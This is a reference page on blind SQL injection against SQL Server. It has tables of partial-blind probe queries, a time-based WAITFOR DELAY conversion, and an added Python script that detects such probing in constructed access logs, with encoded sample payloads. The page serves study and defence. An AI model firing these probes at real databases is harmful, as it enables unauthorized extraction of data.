sqlserver.html
<h3 id="blind-injection">Blind Injection</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.blindBased}}</p>
<h4 class="subheading">Partial-Blind</h4>
<p>Partial-blind injections can be identified by differences in the HTTP response: status codes, response times, content lengths, and HTML content. These markers act as an oracle for true or false statements. The queries below probe the injection by asserting a true or false response for guessed information. True and false can also be distinguished by whether the query returns 1 (true) or 0 (false) rows, and an error can likewise serve as the 0 (false) signal.</p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th>Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Version is 12.0.2000.8</td>
<td>SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'</td>
</tr>
<tr>
<td>Subselect is enabled</td>
<td>SELECT (SELECT @@version)</td>
</tr>
<tr>
<td>Table log_table exists</td>
<td>SELECT * FROM log_table</td>
</tr>
<tr>
<td>Column message exists in table log_table</td>
<td>SELECT message FROM log_table</td>
</tr>
<tr>
<td>First letter of first message is t</td>
<td>WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) AS row, * FROM log_table)<br/> SELECT message FROM data WHERE row = 1 AND message LIKE 't%'</td>
</tr>
</tbody>
</table>
<h4 class="subheading">Converting Partial-Blind queries to Full-Blind queries</h4>
<p>Any of the above queries can be used in a full-blind scenario by wrapping it as follows, where <em>PARTIAL_BLIND_QUERY</em> stands for a query from the table above: <br/><code>IF exists(*PARTIAL_BLIND_QUERY*) WAITFOR DELAY '00:00:02'</code></p>
<h4 class="subheading">Full-Blind</h4>
<p>Full-blind queries give no indication of the query's result in the HTTP/HTML response, so they depend on timing functions and other <a class="link" href="{{site.pagebase}}/attackQueries/dataExfiltration">out-of-band methods</a> for attacks. With a delay of X seconds, a true statement takes at least X seconds to respond, while a false statement returns immediately.</p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th align="left">Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Version is 12.0.2000.8</td>
<td>IF exists(SELECT @@version where @@version like '%12.0.2000.8%') WAITFOR DELAY '00:00:02'</td>
</tr>
</tbody>
</table>
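<p>From the defender's side, the same two oracles described above (a response whose shape differs between true and false, and a response delayed by a <code>WAITFOR DELAY</code>) are exactly what shows up in web server logs. The script below is an added example, not part of the SQL Injection Wiki: it parses a constructed set of access-log lines (combined log format with an assumed trailing field for server response time in milliseconds), flags requests whose decoded query string carries the SQL Server markers used on this page, reports whether a logged <code>WAITFOR DELAY</code> actually executed by comparing the requested delay with the observed latency, and flags a client whose SQL-looking requests to one path produced more than one response shape, which is the partial-blind oracle from the first section. The log format, IP addresses, paths and all payloads are constructed for illustration.</p>

```python
"""Flag blind SQL injection probing in web access logs (added example).

The log format and every sample line below are constructed; the trailing
numeric field is an assumed per-request server response time in ms.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: one client probing /search with the partial-blind and
# full-blind queries from this page, plus two ordinary requests from another.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /search?q=printer HTTP/1.1" 200 5120 12
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /search?q=printer'+AND+EXISTS(SELECT+@@version+WHERE+@@version+LIKE+'%2512.0.2000.8%25')-- HTTP/1.1" 200 5120 14
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /search?q=printer'+AND+EXISTS(SELECT+@@version+WHERE+@@version+LIKE+'%2513.0.4001.0%25')-- HTTP/1.1" 200 310 11
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /search?q=printer'+AND+EXISTS(SELECT+*+FROM+log_table)-- HTTP/1.1" 200 5120 13
10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /search?q=printer'+AND+EXISTS(SELECT+*+FROM+audit_table)-- HTTP/1.1" 500 287 9
10.0.0.5 - - [01/Jan/2024:12:00:05 +0000] "GET /search?q=printer';IF+exists(SELECT+@@version+where+@@version+like+'%2512.0.2000.8%25')+WAITFOR+DELAY+'00:00:02'-- HTTP/1.1" 200 5120 2015
10.0.0.5 - - [01/Jan/2024:12:00:08 +0000] "GET /search?q=printer';IF+exists(SELECT+@@version+where+@@version+like+'%2513.0.4001.0%25')+WAITFOR+DELAY+'00:00:02'-- HTTP/1.1" 200 5120 13
10.0.0.9 - - [01/Jan/2024:12:00:10 +0000] "GET /search?q=laptops HTTP/1.1" 200 4870 15
10.0.0.9 - - [01/Jan/2024:12:00:11 +0000] "GET /search?q=phones HTTP/1.1" 200 5002 14
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+)$'
)
# SQL Server constructs that appear in the queries on this page.
SQL_MARKERS = re.compile(
    r"@@version|\bWAITFOR\s+DELAY\b|\bIF\s+exists\s*\(|\bROW_NUMBER\s*\("
    r"|\bSELECT\b[^;]*\bFROM\b|\bEXISTS\s*\(",
    re.IGNORECASE,
)
DELAY_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d{2}):(\d{2}):(\d{2})'", re.IGNORECASE)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["target"])  # '+' -> space, %xx -> byte
    for key in ("status", "bytes", "ms"):
        rec[key] = int(rec[key])
    return rec


def analyze(log_text):
    """Return signature hits, time-based findings and partial-blind oracles."""
    findings = {"signature_hits": [], "time_based": [], "partial_blind": []}
    groups = defaultdict(list)  # (client ip, path) -> SQL-flagged requests
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not SQL_MARKERS.search(rec["decoded"]):
            continue
        findings["signature_hits"].append((rec["ip"], rec["decoded"]))
        groups[(rec["ip"], rec["decoded"].split("?", 1)[0])].append(rec)
        delay = DELAY_RE.search(rec["decoded"])
        if delay:
            h, mi, s = (int(x) for x in delay.groups())
            requested_ms = (h * 3600 + mi * 60 + s) * 1000
            # Latency at or above the requested delay means the server ran the
            # WAITFOR, i.e. the injected condition evaluated true.
            findings["time_based"].append({
                "ip": rec["ip"], "requested_ms": requested_ms,
                "observed_ms": rec["ms"], "executed": rec["ms"] >= requested_ms,
            })
    for (ip, path), recs in groups.items():
        # Two or more distinct (status, size) shapes for SQL-flagged requests to
        # one path is the partial-blind true/false oracle described above.
        shapes = {(r["status"], r["bytes"]) for r in recs}
        if len(recs) >= 2 and len(shapes) >= 2:
            findings["partial_blind"].append({
                "ip": ip, "path": path, "requests": len(recs),
                "response_shapes": sorted(shapes),
            })
    return findings


if __name__ == "__main__":
    for kind, items in analyze(SAMPLE_LOG).items():
        print(kind)
        for item in items:
            print("  ", item)
```

<p>Two caveats when running this over real logs: the latency comparison is only meaningful if the response time is measured at the application or reverse proxy rather than at the client, and the response-shape heuristic is noisy on endpoints whose output size legitimately varies, so treat it as a trigger for correlating request volume and the SQL signature hits rather than as an alert on its own.</p>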